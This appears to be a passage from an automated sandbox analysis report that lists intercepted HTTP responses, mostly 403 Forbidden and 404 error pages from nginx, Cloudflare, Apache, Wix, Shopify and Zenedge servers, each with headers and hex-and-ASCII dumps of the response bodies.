2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:39 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMdR+KIVPfgRMI8Uu3xBu5ub,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=X-Wix-Request-Id: 1679460219.274272317223423579X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:39 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BmNvhJ%2FbiSuhW7J5mvni%2FnRHerSWn9%2FUJspwF2h1jwEfc1mV%2BzsjcCK0pjBJ7Q%2BttyO5J3QCwUp52IJ%2FE4H0kxzKoF%2BefdjDZ7vL14tyjYVE%2BJt%2Fn2d5T5bl%2FI3dX1B4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc662791e9070-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:39 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kbE4mK5Wj%2FDW87FuIpa9bgmywYGMHqovyoLrV8u%2F19TmuUEjMacqkZs9P4fOC3UBSMZfTA1jxW5cYTW3JHypTM%2F7%2B6cBCtd9CPJHPq8E%2B9gkg3inhoSLnRkEmAQQQoDS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc662f97b9070-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:43:39 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:40 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yCli%2B95jq%2FOwFTvDWVUYEatXV9%2FQNhafX19cGCSsFTGC6klFJc6b1CKCVwAk863U6i0cVuBd0HirlJ8UFdrmIqpt4PE2chGQ6%2BXthBWERmIRiRkgl6%2F7JG2KHWd%2F5yPUrOI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc6682dc32bb5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; fo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:40 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:40 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:43 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o%2FHeO4t5i%2F%2F%2BbsxEQJMDf%2BRX0pShfjshtCA9RmC7jzFI%2BqMmw38G0zBMBXpvBeLYXHA8LFelOIKnXGIskDG4x2DOl3Hzof2j736Qo0bnEm8Sf8UErXgDVgEzCHkeaX%2Fh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc67ccaee2c5d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:43 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bufSTH1avk5zfSAGOxZIw5s4wWMgPu5B03QETYXMV%2FBdpxwSsMMjkyfa7f%2Ben2XcQm1NIy3q2r57OJxg7kUD7h48Duoel29YfO6ea4lluTpbXOxruYj9X5y2eVdkBccH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc67cfb192c5d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:43 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kRhMOsluXCiI9Ag3CnU5KbG3biw8O8bvrUyTrd3iqliiq0VmKkB0bhw%2B0vY%2FARV0m1yzNOXFKpZF6K6e3IKH7BkNhtGj%2BVx3AnEX1iN8nwCCD5PQAJSfjSKKg4XKL%2FI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc67d4a843a5c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:43 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vyYGgwErjCb36OURrTlh8NZcw4rnAsXGt%2FgD5eRHAqfn%2FKZUQ79ypp3DtQyqrEwPNeVYWx9QkVpjkAriIozE6JxWn79YaJCkQ5RjerU%2FH4NWeFiwwp%2Fcfe3t1kf6qHE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc67d9ab93a5c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:43:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: 96c85b62-19c4-45c7-837f-c8c960964d17CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vq2Rhhj99pOUqoIpU3l0Mko8pY3tQsbQmKRVcX165k9RfH0c3De8nPq97Vi9BBWXVDcrq5c4e4NQbo9sGrdDHlQp9ws48jTJUwZg1XDRCpOp7P2xcsaxc4Tl%2BXlAsuU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=131.999969Server: cloudflareCF-RAY: 7abbc67f0b679954-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Wed, 22 Mar 2023 04:43:44 GMTX-Zen-Fury: 0b8cb7b3597b8a74a30a52d81a206a7f0929fd7cCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Cache-Status: Server: ZENEDGEData Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 32 30 34 37 22 2c 20 31 36 37 39 34 36 30 31 39 34 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC2047", 1679460194, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:48 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd8Vr9mc62aLGQToPV1lNMm,qquldgcFrj2n046g4RNSVIrig9SAqnXW0O7zAzsQkQs=X-Wix-Request-Id: 1679460228.21217234996116071X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 